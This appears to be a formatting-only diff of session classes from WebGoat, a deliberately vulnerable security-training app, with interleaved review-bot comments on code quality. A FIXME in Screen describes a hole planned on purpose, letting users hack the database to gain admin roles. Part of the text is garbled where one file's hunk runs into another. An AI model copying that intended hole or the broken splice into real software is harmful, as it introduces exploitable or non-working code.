@@ -753,16 +734,15 @@ public class ParameterParser try { return getSubParameter(first, next); - } - catch (Exception e) + } catch (Exception e) { return def; } } /** - * Gets the parameter named 'next' following the parameter 'first'. Presumes - * the structure: first=firstvalue&next=nextValue + * Gets the parameter named 'next' following the parameter 'first'. Presumes the structure: + * first=firstvalue&next=nextValue * * @param first * Description of the Parameter @@ -780,20 +760,19 @@ public class ParameterParser if (values == null) { throw new ParameterNotFoundException(first + " not found"); - } else if (values[0].length() == 0) + } + else if (values[0].length() == 0) { throw new ParameterNotFoundException(first + " was empty"); - } else + } + else { value = clean(values[0].trim()); int idx = value.indexOf("&") + 1; // index of first char of first sub-param name - if (idx == 0) - { - throw new ParameterNotFoundException("No subparameter key"); - } + if (idx == 0) { throw new ParameterNotFoundException("No subparameter key"); } value = value.substring(idx); @@ -803,17 +782,15 @@ public class ParameterParser // System.out.println("= = = = = =Parameter parser nextValueIndex = // " + nextValueIndex ); - if (nextValueIndex < 0) - { - throw new ParameterNotFoundException("No subparameter value"); - } + if (nextValueIndex < 0) { throw new ParameterNotFoundException("No subparameter value"); } nextValueIndex += (next.length() + 1); if (nextValueIndex >= 0) { value = value.substring(nextValueIndex); - } else + } + else { throw new ParameterNotFoundException(next + " not found"); } 
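Review bot: The `else` branch that throws `ParameterNotFoundException(next + " not found")` is unreachable on the new side: `nextValueIndex` has just passed `if (nextValueIndex < 0) throw ...`, and adding `next.length() + 1` (at least 1) cannot make a non-negative int negative short of overflow, so `if (nextValueIndex >= 0)` is always true. Either drop the dead branch and write `value = value.substring(nextValueIndex);` unconditionally, or, if the intent was to check that `next` is followed by `=` at that position, test that explicitly rather than relying on the sign. The enclosing getSubParameter begins in the preceding `@@ -780` hunk and ends outside this one.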
@@ -861,35 +838,30 @@ public class ParameterParser try { return getWordParameter(name); - } - catch (Exception e) + } catch (Exception e) { return def; } } /** - * Gets the specified parameter from the request and validates it against - * the provided regular expression. If the regular expression check fails, - * the default value is returned instead. + * Gets the specified parameter from the request and validates it against the provided regular + * expression. If the regular expression check fails, the default value is returned instead. * * @param name * The name of the parameter to retrieve from the request. * @param def * The default value of the parameter. * @param regexpattern - * The precompiled regular expression to be used to validate the - * parameter. - * @return The validated parameter value, or the default value if validation - * failed. + * The precompiled regular expression to be used to validate the parameter. + * @return The validated parameter value, or the default value if validation failed. */ private String getRegexParameter(String name, String def, Pattern regexpattern) throws ValidationException { try { return getRegexParameter(name, regexpattern); - } - catch (Exception e) + } catch (Exception e) { // System.out.println("Exception occured in defined pattern match"); // e.printStackTrace(); 
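Review bot: `getRegexParameter(String, String, Pattern)` declares `throws ValidationException`, but its body catches `Exception`, which includes `ValidationException`, so the declared exception can never escape and callers are made to handle something that does not happen. Drop the `throws` clause, or narrow the catch to `ParameterNotFoundException` if a failed validation is meant to propagate rather than yield the default. The Javadoc only mentions a failed regex check, yet the same catch presumably also turns a missing parameter into `def`, so the return tag should read `@return the validated value, or {@code def} if the parameter is missing or fails validation`. The catch block and the rest of the method continue outside this hunk.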
@@ -898,29 +870,27 @@ public class ParameterParser } /** - * Gets the specified parameter from the request and validates it against - * the provided regular expression. If the regular expression check fails, - * the default value is returned instead. + * Gets the specified parameter from the request and validates it against the provided regular + * expression. If the regular expression check fails, the default value is returned instead. * * @param name * The name of the parameter to retrieve from the request. * @param def * The default value of the parameter. * @param regexpattern - * The precompiled regular expression to be used to validate the - * parameter. - * @return The validated parameter value, or the default value if validation - * failed. + * The precompiled regular expression to be used to validate the parameter. + * @return The validated parameter value, or the default value if validation failed. */ private String getRegexParameter(String name, Pattern regexpattern) throws ParameterNotFoundException, - ValidationException + ValidationException { String param = getStringParameter(name); if (regexpattern.matcher(param).matches()) { return param; - } else + } + else { // System.out.println(param + " didn't match defined pattern."); throw new ValidationException(name + " contained an invalid value"); @@ -928,7 +898,7 @@ public class ParameterParser } public String getStrictAlphaParameter(String name, int maxLength) throws ParameterNotFoundException, - ValidationException + ValidationException { String alphaRegEx = "^[a-zA-Z\\s]{0," + maxLength + "}$"; Pattern alphaPattern = Pattern.compile(alphaRegEx); @@ -937,7 +907,7 @@ public class ParameterParser } public String getStrictNumericParameter(String name, int maxLength) throws ParameterNotFoundException, - ValidationException + ValidationException { String numericRegEx = "^\\d{0," + maxLength + "}$"; Pattern numericPattern = Pattern.compile(numericRegEx); 
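Review bot: `getStrictAlphaParameter` and `getStrictNumericParameter` build a regex string and `Pattern.compile` it on every call, while the same file caches `URLpattern` as `static final` (the `@@ -1025` hunk); since only `maxLength` varies, a cached `^[a-zA-Z\\s]*$` / `^\\d*$` pattern plus a `param.length() <= maxLength` check expresses the same acceptance rule without recompiling. Interpolating `maxLength` into the `{0,n}` quantifier also means a negative argument surfaces as a `PatternSyntaxException` instead of a clear precondition failure, so validate it first: `if (maxLength < 0) throw new IllegalArgumentException("maxLength must be >= 0");`. Both method bodies continue past the end of the hunk, so where the compiled pattern is handed off is not visible here.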
@@ -1025,8 +995,7 @@ public class ParameterParser return getRegexParameter(name, def, datepattern); } - private static final String URLREGEX = - "^(((https?)://)([-()_.!~*';/?:@&=+$,A-Za-z0-9])+)([).!';/?:,][[:blank:]])?$"; + private static final String URLREGEX = "^(((https?)://)([-()_.!~*';/?:@&=+$,A-Za-z0-9])+)([).!';/?:,][[:blank:]])?$"; private static final Pattern URLpattern = Pattern.compile(URLREGEX); diff --git a/main/project/JavaSource/org/owasp/webgoat/session/RandomLessonTracker.java b/main/project/JavaSource/org/owasp/webgoat/session/RandomLessonTracker.java index 05f7b1a3d..c9ee5945a 100755 --- a/main/project/JavaSource/org/owasp/webgoat/session/RandomLessonTracker.java +++ b/main/project/JavaSource/org/owasp/webgoat/session/RandomLessonTracker.java 
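Review bot: `URLREGEX` uses the POSIX bracket expression `[[:blank:]]`, which `java.util.regex` does not support; inside a Java character class it parses as a nested class of the literal characters `:`, `b`, `l`, `a`, `n`, `k`, so the optional trailing group `([).!';/?:,][[:blank:]])?` accepts a letter from that set and never a space or tab. This hunk only rejoins the string literal onto one line, so the mistake is carried over unchanged. Replace it with the Java equivalent, `\\p{Blank}` or `[ \\t]`, and add a regression test for an input that ends in the intended whitespace. If `URLpattern` is what validates URL-typed parameters, as its name suggests, the current pattern is rejecting the inputs it was meant to allow while admitting ones it was not.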
@@ -1,90 +1,103 @@ + package org.owasp.webgoat.session; import java.util.HashMap; import java.util.Map; import java.util.Properties; -public class RandomLessonTracker extends LessonTracker { + +public class RandomLessonTracker extends LessonTracker +{ private String[] stages; - + private String stage; - + private Map completed = new HashMap(); - - public RandomLessonTracker(String[] stages) { - if (stages == null) - stages = new String[0]; + + public RandomLessonTracker(String[] stages) + { + if (stages == null) stages = new String[0]; this.stages = stages; } - - public void setStage(String stage) { + + public void setStage(String stage) + { this.stage = stage; } - - public String getStage() { - if (this.stage == null && stages.length > 0) - return stages[0]; + + public String getStage() + { + if (this.stage == null && stages.length > 0) return stages[0]; return this.stage; } - - public void setStageComplete(String stage, boolean complete) { + + public void setStageComplete(String stage, boolean complete) + { completed.put(stage, Boolean.valueOf(complete)); - for (int i=0; iAspect Security - * @created October 28, 2003 + * + * @author Jeff Williams Aspect Security + * @created October 28, 2003 */ public abstract class Screen { - /** - * Description of the Field - */ - public static int MAIN_SIZE = 375; - - //private Head head; - private Element content; - - final static IMG logo = new IMG("images/aspectlogo-horizontal-small.jpg") - .setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0); - - - /** - * Constructor for the Screen object - */ - - public Screen() - {} - - - // FIXME: Each lesson should have a role assigned to it. Each user/student - // should also have a role(s) assigned. The user would only be allowed - // to see lessons that correspond to their role. Eventually these roles - // will be stored in the internal database. The user will be able to hack - // into the database and change their role. 
This will allow the user to - // see the admin screens, once they figure out how to turn the admin switch on. - public abstract String getRole(); - - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - - protected abstract Element createContent(WebSession s); - - - /** - * Gets the credits attribute of the Screen object - * - * @return The credits value - */ - public abstract Element getCredits(); - - - /** - * Creates a new lessonTracker object. - * - * @param props The properties file that was used to persist the user data. - * @return Description of the Return Value - */ - - public LessonTracker createLessonTracker(Properties props) - { - - // If the lesson had any specialized properties in the user persisted properties, - // now would be the time to pull them out. - - return createLessonTracker(); - } - - - /** - * This allows the screens to provide a custom LessonTracker object if needed. - * - * @return Description of the Return Value - */ - public LessonTracker createLessonTracker() - { - return new LessonTracker(); - } - - - /** - * Gets the lessonTracker attribute of the AbstractLesson object - * - * @param userName Description of the Parameter - * @return The lessonTracker value - */ - - public LessonTracker getLessonTracker(WebSession s) - { - UserTracker userTracker = UserTracker.instance(); - return userTracker.getLessonTracker(s, this); - } - - - public LessonTracker getLessonTracker(WebSession s, String userNameOverride) - { - UserTracker userTracker = UserTracker.instance(); - return userTracker.getLessonTracker(s, userNameOverride, this); - } - - - public LessonTracker getLessonTracker(WebSession s, AbstractLesson lesson) - { - UserTracker userTracker = UserTracker.instance(); - return userTracker.getLessonTracker(s, lesson); - } - - - /** - * Fill in a descriptive title for this lesson - * - * @return The title value - */ - public abstract String getTitle(); - - - 
protected void setContent(Element content) - { - this.content = content; - } - - - /** - * Description of the Method - * - * @return Description of the Return Value - */ - - protected Element makeLogo() - { - - return new A("http://www.aspectsecurity.com/webgoat.html", logo); - } - - - public String getSponsor() - { - return "Aspect Security"; - } - - - public String getSponsorLogoResource() - { - return "images/aspectlogo-horizontal-small.jpg"; - } - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - - protected Element makeMessages(WebSession s) - { - - if (s == null) - { - - return (new StringElement("")); - } - - Font f = new Font().setColor(HtmlColor.RED); - - String message = s.getMessage(); - - f.addElement(message); - - return (f); - } - - - /** - * Returns the content length of the the html. - * - */ - - public int getContentLength() - { - return content.toString().length(); - } - - - /** - * Description of the Method - * - * @param out Description of the Parameter - */ - - public void output(PrintWriter out) - { - - // format output -- then send to printwriter - - // otherwise we're doing way too much SSL encryption work - - out.print(content.toString()); - - } - - - public String getContent() - { - return (content == null) ? 
"" : content.toString(); - } - - - /** - * Description of the Method - * - * @param x Description of the Parameter - * @return Description of the Return Value - */ - - protected static String pad(int x) - { - - StringBuffer sb = new StringBuffer(); - - if (x < 10) - { - - sb.append(" "); - - } - - if (x < 100) - { - - sb.append(" "); - - } - - sb.append(x); - - return (sb.toString()); - } - - - /** - * Description of the Method - * - * @param token Description of the Parameter - * @return Description of the Return Value - */ - protected static String convertMetachars(String token) - { - - int mci = 0; - - /* - * meta char array - * - * FIXME: Removed the conversion of whitespace " " to " " in order for the - * html to be automatically wrapped in client browser. It is better to add line - * length checking and only do " " conversion in lines that won't exceed - * screen size, say less than 80 characters. + /** + * Description of the Field */ - String[] metaChar = { "&", "<", ">", "\"", "\t", - System.getProperty("line.separator") }; + public static int MAIN_SIZE = 375; - String[] htmlCode = { "&", "<", ">", """, " ", "
" }; + // private Head head; + private Element content; - String replacedString = token; - for (; mci < metaChar.length; mci += 1) + final static IMG logo = new IMG("images/aspectlogo-horizontal-small.jpg").setAlt("Aspect Security").setBorder(0) + .setHspace(0).setVspace(0); + + /** + * Constructor for the Screen object + */ + + public Screen() { - replacedString = replacedString.replaceAll(metaChar[mci], - htmlCode[mci]); } - return (replacedString); - } + // FIXME: Each lesson should have a role assigned to it. Each user/student + // should also have a role(s) assigned. The user would only be allowed + // to see lessons that correspond to their role. Eventually these roles + // will be stored in the internal database. The user will be able to hack + // into the database and change their role. This will allow the user to + // see the admin screens, once they figure out how to turn the admin switch on. + public abstract String getRole(); - /** - * Description of the Method - * - * @param token Description of the Parameter - * @return Description of the Return Value - */ - protected static String convertMetacharsJavaCode(String token) - { - return (convertMetachars(token).replaceAll(" ", " ")); - } + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ + protected abstract Element createContent(WebSession s); - //protected abstract Element wrapForm( WebSession s ); + /** + * Gets the credits attribute of the Screen object + * + * @return The credits value + */ + public abstract Element getCredits(); + + /** + * Creates a new lessonTracker object. + * + * @param props + * The properties file that was used to persist the user data. 
+ * @return Description of the Return Value + */ + + public LessonTracker createLessonTracker(Properties props) + { + + // If the lesson had any specialized properties in the user persisted properties, + // now would be the time to pull them out. + + return createLessonTracker(); + } + + /** + * This allows the screens to provide a custom LessonTracker object if needed. + * + * @return Description of the Return Value + */ + public LessonTracker createLessonTracker() + { + return new LessonTracker(); + } + + /** + * Gets the lessonTracker attribute of the AbstractLesson object + * + * @param userName + * Description of the Parameter + * @return The lessonTracker value + */ + + public LessonTracker getLessonTracker(WebSession s) + { + UserTracker userTracker = UserTracker.instance(); + return userTracker.getLessonTracker(s, this); + } + + public LessonTracker getLessonTracker(WebSession s, String userNameOverride) + { + UserTracker userTracker = UserTracker.instance(); + return userTracker.getLessonTracker(s, userNameOverride, this); + } + + public LessonTracker getLessonTracker(WebSession s, AbstractLesson lesson) + { + UserTracker userTracker = UserTracker.instance(); + return userTracker.getLessonTracker(s, lesson); + } + + /** + * Fill in a descriptive title for this lesson + * + * @return The title value + */ + public abstract String getTitle(); + + protected void setContent(Element content) + { + this.content = content; + } + + /** + * Description of the Method + * + * @return Description of the Return Value + */ + + protected Element makeLogo() + { + + return new A("http://www.aspectsecurity.com/webgoat.html", logo); + } + + public String getSponsor() + { + return "Aspect Security"; + } + + public String getSponsorLogoResource() + { + return "images/aspectlogo-horizontal-small.jpg"; + } + + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + + protected Element 
makeMessages(WebSession s) + { + + if (s == null) { + + return (new StringElement("")); } + + Font f = new Font().setColor(HtmlColor.RED); + + String message = s.getMessage(); + + f.addElement(message); + + return (f); + } + + /** + * Returns the content length of the the html. + * + */ + + public int getContentLength() + { + return content.toString().length(); + } + + /** + * Description of the Method + * + * @param out + * Description of the Parameter + */ + + public void output(PrintWriter out) + { + + // format output -- then send to printwriter + + // otherwise we're doing way too much SSL encryption work + + out.print(content.toString()); + + } + + public String getContent() + { + return (content == null) ? "" : content.toString(); + } + + /** + * Description of the Method + * + * @param x + * Description of the Parameter + * @return Description of the Return Value + */ + + protected static String pad(int x) + { + + StringBuffer sb = new StringBuffer(); + + if (x < 10) + { + + sb.append(" "); + + } + + if (x < 100) + { + + sb.append(" "); + + } + + sb.append(x); + + return (sb.toString()); + } + + /** + * Description of the Method + * + * @param token + * Description of the Parameter + * @return Description of the Return Value + */ + protected static String convertMetachars(String token) + { + + int mci = 0; + + /* + * meta char array FIXME: Removed the conversion of whitespace " " to " " in order for + * the html to be automatically wrapped in client browser. It is better to add line length + * checking and only do " " conversion in lines that won't exceed screen size, say less + * than 80 characters. + */ + String[] metaChar = { "&", "<", ">", "\"", "\t", System.getProperty("line.separator") }; + + String[] htmlCode = { "&", "<", ">", """, " ", "
" }; + + String replacedString = token; + for (; mci < metaChar.length; mci += 1) + { + replacedString = replacedString.replaceAll(metaChar[mci], htmlCode[mci]); + } + return (replacedString); + } + + /** + * Description of the Method + * + * @param token + * Description of the Parameter + * @return Description of the Return Value + */ + protected static String convertMetacharsJavaCode(String token) + { + return (convertMetachars(token).replaceAll(" ", " ")); + } + + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + + // protected abstract Element wrapForm( WebSession s ); } diff --git a/main/project/JavaSource/org/owasp/webgoat/session/SequentialLessonTracker.java b/main/project/JavaSource/org/owasp/webgoat/session/SequentialLessonTracker.java index bf0e1102f..85937ceeb 100755 --- a/main/project/JavaSource/org/owasp/webgoat/session/SequentialLessonTracker.java +++ b/main/project/JavaSource/org/owasp/webgoat/session/SequentialLessonTracker.java 
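Review bot: `getContentLength()` and `output(PrintWriter)` call `content.toString()` with no null check, while `getContent()` guards `content == null`; a screen whose content was never set would throw an NPE from the first two but return `""` from the third, so the guard should be applied consistently (for example `output` could write `getContent()`). In `convertMetachars`, `String.replaceAll` treats every `metaChar` entry as a regular expression; the present entries are regex-safe, but a future metacharacter such as `.` or `$` would silently change behaviour, and `replace(CharSequence, CharSequence)` gives literal matching with no other change. As rendered here the `htmlCode` table shows the same raw characters as `metaChar` (`"&"`, `"<"`, `">"`), which is probably HTML decoding by the page rather than the checked-in source; if it were real, the method would be an identity and callers relying on it to encode untrusted text for HTML output would get no protection, so it is worth confirming against the file itself. The hunk header for this file was lost in rendering, so the hunk's start is not visible here.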
@@ -1,39 +1,38 @@
+
package org.owasp.webgoat.session;
import java.util.Properties;
-public class SequentialLessonTracker extends LessonTracker {
- private int currentStage = 1;
+public class SequentialLessonTracker extends LessonTracker
+{
+ private int currentStage = 1;
+ public int getStage()
+ {
+ return currentStage;
+ }
- public int getStage()
- {
- return currentStage;
- }
+ public void setStage(int stage)
+ {
+ currentStage = stage;
+ }
+ protected void setProperties(Properties props, Screen screen)
+ {
+ super.setProperties(props, screen);
+ currentStage = Integer.parseInt(props.getProperty(screen.getTitle() + ".currentStage"));
+ }
- public void setStage(int stage)
- {
- currentStage = stage;
- }
+ public void store(WebSession s, Screen screen, String user)
+ {
+ lessonProperties.setProperty(screen.getTitle() + ".currentStage", Integer.toString(currentStage));
+ super.store(s, screen, user);
+ }
- protected void setProperties(Properties props, Screen screen)
- {
- super.setProperties(props, screen);
- currentStage = Integer.parseInt(props.getProperty(screen.getTitle()
- + ".currentStage"));
- }
-
- public void store(WebSession s, Screen screen, String user)
- {
- lessonProperties.setProperty(screen.getTitle() + ".currentStage",
- Integer.toString(currentStage));
- super.store(s, screen, user);
- }
-
- public String toString() {
- return super.toString() + " - currentStage:....... " + currentStage + "\n";
- }
+ public String toString()
+ {
+ return super.toString() + " - currentStage:....... " + currentStage + "\n";
+ }
}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/UnauthenticatedException.java b/main/project/JavaSource/org/owasp/webgoat/session/UnauthenticatedException.java
index efd610750..3e73372f8 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/UnauthenticatedException.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/UnauthenticatedException.java
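Review bot: `setProperties` calls `Integer.parseInt` directly on `props.getProperty(screen.getTitle() + ".currentStage")`, which throws `NumberFormatException` when the key is absent or holds a non-numeric value; these properties appear to come from a per-user persisted file (Screen's `createLessonTracker(Properties)` Javadoc says as much), so a tracker file written before this key existed, or a hand-edited one, would make the whole load fail instead of falling back to stage 1. A guarded read keeps the default: `String raw = props.getProperty(screen.getTitle() + ".currentStage");` / `if (raw != null) currentStage = Integer.parseInt(raw.trim());`, with a `NumberFormatException` catch around the parse if a malformed value should also fall back. `toString()` overrides `Object.toString()` and should carry `@Override`.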
@@ -1,31 +1,30 @@ + package org.owasp.webgoat.session; -/******************************************************************************* +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. 
* * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ diff --git a/main/project/JavaSource/org/owasp/webgoat/session/UnauthorizedException.java b/main/project/JavaSource/org/owasp/webgoat/session/UnauthorizedException.java index d05532419..eb25c482f 100644 --- a/main/project/JavaSource/org/owasp/webgoat/session/UnauthorizedException.java +++ b/main/project/JavaSource/org/owasp/webgoat/session/UnauthorizedException.java 
@@ -1,31 +1,30 @@ + package org.owasp.webgoat.session; -/******************************************************************************* +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. 
* * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ diff --git a/main/project/JavaSource/org/owasp/webgoat/session/UserTracker.java b/main/project/JavaSource/org/owasp/webgoat/session/UserTracker.java index 91808d020..fd2b35ab0 100644 --- a/main/project/JavaSource/org/owasp/webgoat/session/UserTracker.java +++ b/main/project/JavaSource/org/owasp/webgoat/session/UserTracker.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.session; import java.util.ArrayList; 
@@ -5,269 +6,269 @@ import java.util.Collection; import java.util.HashMap; import java.util.Iterator; import java.util.Map; - import org.apache.catalina.Role; import org.apache.catalina.User; import org.apache.catalina.users.MemoryUserDatabase; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Bruce Mayhew WebGoat - * @created October 29, 2003 + * + * @author Bruce Mayhew WebGoat + * @created October 29, 2003 */ public class UserTracker { - private static UserTracker instance; + private static UserTracker instance; - // FIXME: persist this somehow! + // FIXME: persist this somehow! - private static HashMap> storage = new HashMap>(); + private static HashMap> storage = new HashMap>(); - private static MemoryUserDatabase usersDB = new MemoryUserDatabase(); + private static MemoryUserDatabase usersDB = new MemoryUserDatabase(); - - /** - * Constructor for the UserTracker object - */ - private UserTracker() - {} - - - /** - * Gets the completed attribute of the UserTracker object - * - * @param userName Description of the Parameter - * @return The completed value - */ - public int getCompleted(String userName) - { - - HashMap usermap = getUserMap(userName); - - Iterator i = usermap.entrySet().iterator(); - - int count = 0; - - while (i.hasNext()) + /** + * Constructor for the UserTracker object + */ + private UserTracker() { - - Map.Entry entry = (Map.Entry) i.next(); - - int value = ((Integer) entry.getValue()).intValue(); - - if (value > 5) - { - count++; - } - } - return count; - } - - - /** - * Gets the users attribute of the UserTracker object - * - * @return The users value - */ - public Collection getUsers() - { - return storage.keySet(); - } - - - public Collection getAllUsers(String roleName) - { - synchronized 
(usersDB) + /** + * Gets the completed attribute of the UserTracker object + * + * @param userName + * Description of the Parameter + * @return The completed value + */ + public int getCompleted(String userName) { - Collection allUsers = new ArrayList(); - try - { - usersDB.open(); - Iterator users = usersDB.getUsers(); - while (users.hasNext()) + + HashMap usermap = getUserMap(userName); + + Iterator i = usermap.entrySet().iterator(); + + int count = 0; + + while (i.hasNext()) { - User user = (User) users.next(); - Iterator roles = user.getRoles(); - while (roles.hasNext()) - { - Role role = (Role) roles.next(); - if (role.getRolename().trim().equals(roleName)) + + Map.Entry entry = (Map.Entry) i.next(); + + int value = ((Integer) entry.getValue()).intValue(); + + if (value > 5) { - allUsers.add(user.getUsername()); + count++; } - } + } - usersDB.close(); - } - catch (Exception e) - {} - return allUsers; + + return count; } - } - - public void deleteUser(String user) - { - synchronized (usersDB) + /** + * Gets the users attribute of the UserTracker object + * + * @return The users value + */ + public Collection getUsers() { - try - { - usersDB.open(); - Iterator users = usersDB.getUsers(); - while (users.hasNext()) + return storage.keySet(); + } + + public Collection getAllUsers(String roleName) + { + synchronized (usersDB) { - User tomcatUser = (User) users.next(); - if (tomcatUser.getUsername().equals(user)) - { - usersDB.removeUser(tomcatUser); - // FIXME: delete all the lesson tracking property files - break; - } + Collection allUsers = new ArrayList(); + try + { + usersDB.open(); + Iterator users = usersDB.getUsers(); + while (users.hasNext()) + { + User user = (User) users.next(); + Iterator roles = user.getRoles(); + while (roles.hasNext()) + { + Role role = (Role) roles.next(); + if (role.getRolename().trim().equals(roleName)) + { + allUsers.add(user.getUsername()); + } + } + } + usersDB.close(); + } catch (Exception e) + { + } + return allUsers; } - 
usersDB.close(); - - } - catch (Exception e) - {} } - } - - /** - * Gets the lessonTracker attribute of the UserTracker object - * - * @param screen Description of the Parameter - * @param userName Description of the Parameter - * @return The lessonTracker value - */ - public LessonTracker getLessonTracker(WebSession s, Screen screen) - { - return getLessonTracker(s, s.getUserName(), screen); - } - - - public LessonTracker getLessonTracker(WebSession s, String user, - Screen screen) - { - HashMap usermap = getUserMap(user); - LessonTracker tracker = (LessonTracker) usermap.get(screen.getTitle()); - if (tracker == null) + public void deleteUser(String user) { - // Creates a new lesson tracker, if one does not exist on disk. - tracker = LessonTracker.load(s, user, screen); - usermap.put(screen.getTitle(), tracker); + synchronized (usersDB) + { + try + { + usersDB.open(); + Iterator users = usersDB.getUsers(); + while (users.hasNext()) + { + User tomcatUser = (User) users.next(); + if (tomcatUser.getUsername().equals(user)) + { + usersDB.removeUser(tomcatUser); + // FIXME: delete all the lesson tracking property files + break; + } + } + usersDB.close(); + + } catch (Exception e) + { + } + } } - //System.out.println( "User: [" + userName + "] UserTracker:getLessonTracker() LTH " + tracker.hashCode() + " for " + screen ); - return tracker; - } + /** + * Gets the lessonTracker attribute of the UserTracker object + * + * @param screen + * Description of the Parameter + * @param userName + * Description of the Parameter + * @return The lessonTracker value + */ + public LessonTracker getLessonTracker(WebSession s, Screen screen) + { + return getLessonTracker(s, s.getUserName(), screen); + } - /** - * Gets the status attribute of the UserTracker object - * - * @param screen Description of the Parameter - * @param userName Description of the Parameter - * @return The status value - */ - public String getStatus(WebSession s, Screen screen) - { - return ("User [" + 
s.getUserName() + "] has accessed " + screen - + " UserTracker:getStatus()LTH = " + getLessonTracker(s, screen) - .hashCode()); - } + public LessonTracker getLessonTracker(WebSession s, String user, Screen screen) + { + HashMap usermap = getUserMap(user); + LessonTracker tracker = (LessonTracker) usermap.get(screen.getTitle()); + if (tracker == null) + { + // Creates a new lesson tracker, if one does not exist on disk. + tracker = LessonTracker.load(s, user, screen); + usermap.put(screen.getTitle(), tracker); + } + // System.out.println( "User: [" + userName + "] UserTracker:getLessonTracker() LTH " + + // tracker.hashCode() + " + // for " + screen ); + return tracker; + } + /** + * Gets the status attribute of the UserTracker object + * + * @param screen + * Description of the Parameter + * @param userName + * Description of the Parameter + * @return The status value + */ + public String getStatus(WebSession s, Screen screen) + { + return ("User [" + s.getUserName() + "] has accessed " + screen + " UserTracker:getStatus()LTH = " + getLessonTracker( + s, + screen) + .hashCode()); + } - /** - * Gets the userMap attribute of the UserTracker object - * - * @param userName Description of the Parameter - * @return The userMap value - */ - private HashMap getUserMap(String userName) - { - - HashMap usermap = storage.get(userName); - - if (usermap == null) + /** + * Gets the userMap attribute of the UserTracker object + * + * @param userName + * Description of the Parameter + * @return The userMap value + */ + private HashMap getUserMap(String userName) { - usermap = new HashMap(); + HashMap usermap = storage.get(userName); - storage.put(userName, usermap); + if (usermap == null) + { + usermap = new HashMap(); + + storage.put(userName, usermap); + + } + + return 